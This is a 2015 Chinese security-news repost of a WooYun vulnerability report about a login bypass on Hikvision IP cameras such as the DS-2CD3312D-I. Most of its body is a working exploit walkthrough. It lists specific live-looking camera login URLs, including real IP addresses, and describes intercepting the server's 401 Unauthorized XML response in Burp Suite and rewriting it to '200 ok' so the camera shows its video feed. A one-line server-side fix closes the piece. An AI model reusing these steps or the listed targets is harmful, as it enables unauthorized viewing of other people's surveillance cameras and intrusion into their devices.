频道栏目
首页 > 安全 > 网络安全 > 正文
海康威视DS-2CD3312D-I等机型登录绕过可查看监控画面
2015-11-30 09:57:37         来源:WooYun  
收藏   我要投稿

海康威视DS-2CD3312D-I等机型登录绕过直接可查看监控画面,其他型号也可绕过登录界面进入后台,但无法查看监控画面。

示例地址:

https://122.228.120.154/doc/page/login.asp

https://tdcm-motor.com/doc/page/login.asp

https://89.97.149.186/doc/page/login.asp

分别代表多种不同型号海康威视机型

其中https://122.228.120.154/doc/page/login.asp为一台海康威视DS-2CD3312D-I型监控摄像头的登录web地址。

登录界面中输入用户名admin,密码随意,如123。利用burpsuite截取该次HTTP请求的response报文:

HTTP/1.1 200 OK
Date: Tue, 03 Nov 2015 10:47:18 GMT
Server: App-webs/
Connection: close
Content-Length: 195
Content-Type: application/xml



401
Unauthorized





并修改报文为

HTTP/1.1 200 OK
Date: Tue, 03 Nov 2015 10:47:18 GMT
Server: App-webs/
Connection: close
Content-Length: 195
Content-Type: application/xml



200
ok





改修完FORWARD后直接绕过登录验证,进入后台页面,该绕过方式对以上链接中所有设备都有效。



对于DS-2CD3312D-I等型号监控摄像头,可以直接预览到监控画面。

 

QQ图片20151102185922.png



但在进行修改配置、添加用户等其他操作时仍然要进行身份认证,并没有完全获取管理权限。

其他设备好像在预览监控时会出错。

 

QQ图片20151103165148.jpg





ps:很多设备都是默认的弱密码,也无所谓绕过不饶过了。。。

解决方案:

完善服务端验证和cookie验证机制,不要使用客户端javascript脚本验证关键逻辑步骤

 

点击复制链接 与好友分享!回本站首页
上一篇:远程入侵原装乘用车(中)
下一篇:态势感知将DDOS扼杀在摇篮中:涉及数千台PostgreSQL服务器
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站